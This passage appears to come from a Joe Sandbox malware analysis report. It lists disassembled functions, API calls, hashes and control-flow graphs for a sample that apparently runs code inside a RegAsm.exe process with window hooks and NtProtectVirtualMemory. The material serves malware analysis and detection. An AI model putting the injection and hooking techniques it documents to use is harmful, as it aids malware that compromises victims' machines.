                                                                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1599320355-0
                                                                                                • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                • String ID: Version
                                                                                                • API String ID: 512980652-315105994
                                                                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                • String ID:
                                                                                                • API String ID: 2883127279-0
                                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                • String ID: !N~
                                                                                                • API String ID: 623250636-529124213
                                                                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                • API String ID: 3509786178-2769509956
                                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:16.7%
                                                                                                Total number of Nodes:18
                                                                                                Total number of Limit Nodes:1
                                                                                                execution_graph 19918 31a3cf8 19920 31a3d3c SetWindowsHookExW 19918->19920 19921 31a3d82 19920->19921 19922 31a8e08 19923 31a8e4e 19922->19923 19927 31a8fd8 19923->19927 19932 31a8fe8 19923->19932 19924 31a8f3b 19928 31a8fb2 19927->19928 19929 31a8fe2 19927->19929 19928->19924 19935 31a8b7c 19929->19935 19933 31a9016 19932->19933 19934 31a8b7c DuplicateHandle 19932->19934 19933->19924 19934->19933 19936 31a9050 DuplicateHandle 19935->19936 19937 31a9016 19936->19937 19937->19924 19938 31a3368 19939 31a33be NtProtectVirtualMemory 19938->19939 19941 31a3408 19939->19941

                                                                                                Executed Functions

                                                                                                Function 031A2F28 Relevance: 2.0, APIs: 1, Instructions: 452nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 322 31a2f28-31a2f5c 323 31a2f68-31a2f6b 322->323 324 31a2f5e-31a2f60 322->324 325 31a2f71-31a2f94 323->325 326 31a32d6-31a3305 323->326 324->326 327 31a2f66 324->327 330 31a2fa0-31a2fa3 325->330 331 31a2f96-31a2f98 325->331 342 31a330c-31a3310 326->342 327->325 330->326 334 31a2fa9-31a2fcf 330->334 331->326 332 31a2f9e 331->332 332->334 337 31a2fdd-31a2fe1 334->337 338 31a2fd1-31a2fd5 334->338 337->326 341 31a2fe7-31a2ff5 337->341 338->326 339 31a2fdb 338->339 339->341 346 31a2ff7-31a3002 341->346 347 31a3004-31a300c 341->347 344 31a331d-31a3406 NtProtectVirtualMemory 342->344 345 31a3312-31a331c 342->345 371 31a3408-31a340e 344->371 372 31a340f-31a3434 344->372 349 31a300f-31a3011 346->349 347->349 350 31a301d-31a3020 349->350 351 31a3013-31a3015 349->351 350->326 353 31a3026-31a3049 350->353 351->326 354 31a301b 351->354 357 31a304b-31a304d 353->357 358 31a3055-31a3058 353->358 354->353 357->326 359 31a3053 357->359 358->326 361 31a305e-31a3082 358->361 359->361 364 31a308e-31a3091 361->364 365 31a3084-31a3086 361->365 364->326 366 31a3097-31a30b8 364->366 365->326 367 31a308c 365->367 373 31a30ba-31a30bc 366->373 374 31a30c4-31a30c7 366->374 367->366 371->372 373->326 376 31a30c2 373->376 374->326 375 31a30cd-31a30f1 374->375 381 31a30fd-31a3100 375->381 382 31a30f3-31a30f5 375->382 376->375 381->326 384 31a3106-31a312a 381->384 382->326 383 31a30fb 382->383 383->384 386 31a312c-31a312e 384->386 387 31a3136-31a3139 384->387 386->326 389 31a3134 386->389 387->326 388 31a313f-31a3163 387->388 391 31a316f-31a3172 388->391 392 31a3165-31a3167 388->392 389->388 391->326 393 31a3178-31a318b 391->393 392->326 394 31a316d 392->394 393->342 396 31a3191-31a31c0 393->396 394->393 397 31a31cc-31a31cf 396->397 398 31a31c2-31a31c4 396->398 397->326 400 31a31d5-31a31ed 397->400 398->326 399 31a31ca 398->399 399->400 402 31a31f9-31a31fc 400->402 403 31a31ef-31a31f1 400->403 402->326 404 31a3202-31a3219 402->404 403->326 405 31a31f7 403->405 408 31a321f-31a3242 404->408 409 31a32c5-31a32ce 404->409 405->404 411 31a324e-31a3251 408->411 412 31a3244-31a3246 408->412 409->396 410 31a32d4 409->410 410->342 411->326 413 31a3257-31a3287 411->413 412->326 414 31a324c 412->414 416 31a3289-31a328b 413->416 417 31a328f-31a3292 413->417 414->413 416->326 418 31a328d 416->418 417->326 419 31a3294-31a32b1 417->419 418->419 421 31a32b9-31a32bc 419->421 422 31a32b3-31a32b5 419->422 421->326 423 31a32be-31a32c3 421->423 422->326 424 31a32b7 422->424 423->342 424->423
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 031A33F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: c7b1995083cdcce510bfb741394c87be2409b9b141552f432730e1cdfc1da2c1
                                                                                                • Instruction ID: 010627edb36ae77608e0599c71c9651f2bce7dcda20687f6ecca2a67bcc0e364
                                                                                                • Opcode Fuzzy Hash: c7b1995083cdcce510bfb741394c87be2409b9b141552f432730e1cdfc1da2c1
                                                                                                • Instruction Fuzzy Hash: 46E1C13DF0470547DF58CAAD8C903AEB6A36FCC222F5C862AD926DB784EB74D8055740
                                                                                                Function 031A3368 Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 607 31a3368-31a3406 NtProtectVirtualMemory 610 31a3408-31a340e 607->610 611 31a340f-31a3434 607->611 610->611
                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 031A33F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 22989e3c4ce6511d642d3c5806356023a21ec5d9c6814fdb39ae56dab13eee29
                                                                                                • Instruction ID: 4c95d1dff3dd97f2f8d3baa69b6138dd8a140f5b3a477a5053c7bc020fe745f2
                                                                                                • Opcode Fuzzy Hash: 22989e3c4ce6511d642d3c5806356023a21ec5d9c6814fdb39ae56dab13eee29
                                                                                                • Instruction Fuzzy Hash: A621EFB5D003499FDB10CFAAD980BDEFBF5FF48310F24882AE519A7210C73599158BA4
                                                                                                Function 07024CD0 Relevance: 4.1, Strings: 3, Instructions: 314COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0Hq$0Hq$$q
                                                                                                • API String ID: 0-296434829
                                                                                                • Opcode ID: 0c5415ea1550eb97cb87928981a619e0eb0e87e146a75c224b5ae5868385a26a
                                                                                                • Instruction ID: 615d204f9db6e5f2ea0ad7adebe00343beb7e8d2a86791fd9a81cd283f8734df
                                                                                                • Opcode Fuzzy Hash: 0c5415ea1550eb97cb87928981a619e0eb0e87e146a75c224b5ae5868385a26a
                                                                                                • Instruction Fuzzy Hash: 69B18E70B002199FDB58DF6DD8507AEB7E7FFC9610B248529E909D7390DA30DC428BA1
                                                                                                Function 07026000 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 250 7026000-702600d 251 7026013 250->251 252 7026167-7026170 250->252 254 7026082-702608b 251->254 255 7026153 251->255 256 70260d4-70260dd 251->256 257 702601a-7026029 251->257 258 702613a-7026151 251->258 259 7026058-7026061 251->259 260 7026128-7026138 251->260 261 702602e-7026033 251->261 262 70260fe-7026107 251->262 263 70260ac-70260b5 251->263 264 702615d-7026165 251->264 253 7026176-7026179 252->253 269 7026099-70260a7 254->269 270 702608d-702608f 254->270 293 7026155 call 70261b0 255->293 294 7026155 call 70261c0 255->294 273 70260eb-70260fc 256->273 274 70260df-70260e1 256->274 257->253 258->253 267 7026063-7026065 259->267 268 702606f-702607d 259->268 260->253 275 7026035-702603b 261->275 276 702604b-7026053 261->276 265 7026115-7026126 262->265 266 7026109-702610b 262->266 271 70260c3-70260cf 263->271 272 70260b7-70260b9 263->272 264->253 265->253 266->265 267->268 268->253 269->253 270->269 271->253 272->271 273->253 274->273 277 702603f-7026049 275->277 278 702603d 275->278 276->253 277->276 278->276 281 702615b 281->253 293->281 294->281
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q$$q
                                                                                                • API String ID: 0-3126353813
                                                                                                • Opcode ID: 985086303a85b1e4c6ed90769354ce1d7fe40de40f485461bcb28197b902b0ba
                                                                                                • Instruction ID: 007c40ec92aadb09de3bfc31ce5013c107c9c3f7f1e5d5122d1d0b0996be32fa
